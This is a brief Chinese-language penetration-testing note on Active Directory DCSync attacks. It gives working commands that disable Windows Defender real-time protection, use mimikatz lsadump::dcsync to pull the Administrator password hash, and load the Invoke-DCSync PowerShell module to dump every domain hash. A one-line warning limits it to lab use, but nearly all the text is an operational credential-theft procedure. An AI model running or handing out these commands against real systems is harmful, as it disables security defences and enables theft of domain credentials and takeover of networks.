Invoke-DCSync 参考:https://adsecurity.org/?p=1729 参考:https://silentbreaksecurity.com/invoke-dcsync-because-we-all-wanted-it/ 目标:使用 mimikatz DCSync 功能从域控制器检索所有用户账户的密码哈希
警告:仅在实验环境中执行此操作。
mimikatz 实现了一个名为 DCSync 的工具,这使 mimikatz 能够模拟域控制器,并尝试从另一个域控制器检索所有密码哈希。
你可能需要禁用 Windows Defender
以管理员身份打开 PowerShell 并输入
$ Set-MpPreference -DisableRealtimeMonitoring $true
启动 mimikatz
$ lsadump::dcsync /domain:test.local /user:Administrator
现在你已获得该用户的密码哈希
这要求你具有管理员访问权限,特别是 Get-Replication-Changes-All 通用名称属性
可以使用 Invoke-DCSync 模块提取所有哈希。
下载自:https://gist.github.com/monoxgas/9d238accd969550136db
$ Import-Module ./Invoke-DCSync.ps1
$ Invoke-DCSync -PWDumpFormat